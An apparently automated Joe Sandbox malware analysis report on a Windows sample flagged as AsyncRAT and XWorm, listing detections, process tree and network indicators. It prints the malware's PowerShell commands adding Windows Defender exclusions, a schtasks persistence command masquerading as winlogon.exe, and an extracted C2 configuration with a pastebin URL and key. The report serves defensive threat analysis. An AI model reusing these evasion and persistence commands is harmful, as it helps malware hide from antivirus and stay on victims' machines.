Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1bE8S5sN9S.exe

Overview

General Information

Sample name:1bE8S5sN9S.exe
renamed because original name is a hash value
Original sample name:8efa6f0711c60afd3e6cb29df2b740ee4d01b7f4290a223aa85c6f54fb3b9da5.exe
Analysis ID:1546349
MD5:f2a18b995a82e938ab6a067491aa0d79
SHA1:d437fca2f38d712bafae8c92169eec8934699e54
SHA256:8efa6f0711c60afd3e6cb29df2b740ee4d01b7f4290a223aa85c6f54fb3b9da5
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1bE8S5sN9S.exe (PID: 5580 cmdline: "C:\Users\user\Desktop\1bE8S5sN9S.exe" MD5: F2A18B995A82E938AB6A067491AA0D79)
    • powershell.exe (PID: 2876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1bE8S5sN9S.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5588 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winlogon.exe (PID: 4824 cmdline: C:\ProgramData\winlogon.exe MD5: F2A18B995A82E938AB6A067491AA0D79)
  • winlogon.exe (PID: 5856 cmdline: C:\ProgramData\winlogon.exe MD5: F2A18B995A82E938AB6A067491AA0D79)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/QUwdrCNg"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1bE8S5sN9S.exeJoeSecurity_XWormYara detected XWormJoe Security
    1bE8S5sN9S.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xcc83:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xcd20:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xce35:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xc3df:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\winlogon.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\ProgramData\winlogon.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xcc83:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xcd20:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xce35:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xc3df:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xca83:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xcb20:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xcc35:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xc1df:$cnc4: POST / HTTP/1.1
        Process Memory Space: 1bE8S5sN9S.exe PID: 5580JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Process Memory Space: 1bE8S5sN9S.exe PID: 5580JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.1bE8S5sN9S.exe.200000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.1bE8S5sN9S.exe.200000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xcc83:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xcd20:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xce35:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xc3df:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\1bE8S5sN9S.exe, ProcessId: 5580, TargetFilename: C:\ProgramData\winlogon.exe
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1bE8S5sN9S.exe", ParentImage: C:\Users\user\Desktop\1bE8S5sN9S.exe, ParentProcessId: 5580, ParentProcessName: 1bE8S5sN9S.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', ProcessId: 2876, ProcessName: powershell.exe
              Sigma detected: System File Execution Location Anomaly
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\winlogon.exe, CommandLine: C:\ProgramData\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\winlogon.exe, NewProcessName: C:\ProgramData\winlogon.exe, OriginalFileName: C:\ProgramData\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\ProgramData\winlogon.exe, ProcessId: 4824, ProcessName: winlogon.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1bE8S5sN9S.exe", ParentImage: C:\Users\user\Desktop\1bE8S5sN9S.exe, ParentProcessId: 5580, ParentProcessName: 1bE8S5sN9S.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', ProcessId: 2876, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1bE8S5sN9S.exe", ParentImage: C:\Users\user\Desktop\1bE8S5sN9S.exe, ParentProcessId: 5580, ParentProcessName: 1bE8S5sN9S.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', ProcessId: 2876, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1bE8S5sN9S.exe", ParentImage: C:\Users\user\Desktop\1bE8S5sN9S.exe, ParentProcessId: 5580, ParentProcessName: 1bE8S5sN9S.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe', ProcessId: 2876, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\ProgramData\winlogon.exe, CommandLine: C:\ProgramData\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\winlogon.exe, NewProcessName: C:\ProgramData\winlogon.exe, OriginalFileName: C:\ProgramData\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\ProgramData\winlogon.exe, ProcessId: 4824, ProcessName: winlogon.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Schedule system process
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\1bE8S5sN9S.exe", ParentImage: C:\Users\user\Desktop\1bE8S5sN9S.exe, ParentProcessId: 5580, ParentProcessName: 1bE8S5sN9S.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe", ProcessId: 5588, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T19:49:21.972439+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549710TCP
              2024-10-31T19:50:01.056065+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549939TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T19:51:11.371806+010028559241Malware Command and Control Activity Detected192.168.2.549984108.177.127.1476040TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 1bE8S5sN9S.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\ProgramData\winlogon.exeAvira: detection malicious, Label: TR/Spy.Gen
              Found malware configuration
              Source: 1bE8S5sN9S.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/QUwdrCNg"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\winlogon.exeReversingLabs: Detection: 81%
              Multi AV Scanner detection for submitted file
              Source: 1bE8S5sN9S.exeReversingLabs: Detection: 81%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\ProgramData\winlogon.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 1bE8S5sN9S.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 1bE8S5sN9S.exeString decryptor: https://pastebin.com/raw/QUwdrCNg
              Source: 1bE8S5sN9S.exeString decryptor: <123456789>
              Source: 1bE8S5sN9S.exeString decryptor: <Xwormmm>
              Source: 1bE8S5sN9S.exeString decryptor: Clipper
              Source: 1bE8S5sN9S.exeString decryptor: USB.exe
              Source: 1bE8S5sN9S.exeString decryptor: %ProgramData%
              Source: 1bE8S5sN9S.exeString decryptor: winlogon.exe
              Source: 1bE8S5sN9S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49977 version: TLS 1.2
              Source: 1bE8S5sN9S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49984 -> 108.177.127.147:6040
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://pastebin.com/raw/QUwdrCNg
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: global trafficTCP traffic: 192.168.2.5:49978 -> 108.177.127.147:6040
              Source: global trafficHTTP traffic detected: GET /raw/QUwdrCNg HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49710
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49939
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.147
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /raw/QUwdrCNg HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: powershell.exe, 0000000B.00000002.2709388986.000001FE532FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 0000000B.00000002.2709388986.000001FE532FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: powershell.exe, 00000008.00000002.2489881208.00000206DA4EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
              Source: powershell.exe, 00000002.00000002.2204349762.0000027AB6292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311462978.000002291F333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469821953.00000206D1F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3347814438.00000000026D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
              Source: powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2185437882.0000027AA6449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C2139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3347814438.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185437882.0000027AA6221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C1F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2185437882.0000027AA6449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C2139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000008.00000002.2487241796.00000206DA2E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.9G
              Source: powershell.exe, 00000002.00000002.2185437882.0000027AA6221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C1F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2204349762.0000027AB6292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311462978.000002291F333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469821953.00000206D1F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3347814438.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
              Source: winlogon.exe, 00000010.00000002.3309302012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/QUwdrCNg
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49977 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1bE8S5sN9S.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.1bE8S5sN9S.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\ProgramData\winlogon.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeCode function: 0_2_00007FF848E696960_2_00007FF848E69696
